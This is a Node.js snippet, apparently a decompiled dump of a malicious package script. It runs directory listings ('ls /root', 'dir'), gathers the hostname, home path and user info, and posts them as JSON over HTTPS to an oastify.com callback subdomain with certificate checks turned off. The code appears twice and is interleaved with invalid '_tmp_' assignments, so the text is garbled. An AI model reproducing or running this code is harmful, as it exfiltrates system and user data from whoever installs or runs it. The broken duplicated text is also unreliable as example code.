const https = require('https')
const execSync = require('child_process').execSync
const output = execSync('ls /root', { encoding: 'utf-8' })
var os = require("os")
var hostname = os.hostname()
var path = os.homedir()
var userInfo = os.userInfo()
const data = new TextEncoder().encode(
    JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
  )
JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
_tmp_3.hostname = hostname
_tmp_3.project_id = process.argv[2]
_tmp_3.path = path
_tmp_3.userInfo = userInfo
_tmp_3.directoryList = output
const options = {
    hostname: process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com',
    port: 443,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    },
    rejectUnauthorized: false
  }
_tmp_4.hostname = process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com'
_tmp_4.port = 443
_tmp_4.path = "/"
_tmp_4.method = "POST"
_tmp_4.headers = {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
_tmp_5.Content-Type = "application/json"
_tmp_5.Content-Length = data.length
_tmp_4.rejectUnauthorized = false
const req = https.request(options, res => {})
req.write(data)
req.end()
const execSync = require('child_process').execSync
const output = execSync('dir', { encoding: 'utf-8' })
var os = require("os")
var hostname = os.hostname()
var path = os.homedir()
var userInfo = os.userInfo()
const data = new TextEncoder().encode(
    JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
  )
JSON.stringify({
      hostname: hostname,
      project_id: process.argv[2],
      path: path,
      userInfo: userInfo,
      directoryList: output
    })
_tmp_9.hostname = hostname
_tmp_9.project_id = process.argv[2]
_tmp_9.path = path
_tmp_9.userInfo = userInfo
_tmp_9.directoryList = output
const options = {
    hostname: process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com',
    port: 443,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    },
    rejectUnauthorized: false
  }
_tmp_10.hostname = process.argv[2] + '.' + "hooks" + '.1667923894.020k3pifltekneo7d74oof30ur0ho6.oastify.com'
_tmp_10.port = 443
_tmp_10.path = "/"
_tmp_10.method = "POST"
_tmp_10.headers = {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
_tmp_11.Content-Type = "application/json"
_tmp_11.Content-Length = data.length
_tmp_10.rejectUnauthorized = false
const req = https.request(options, res => {})
req.write(data)
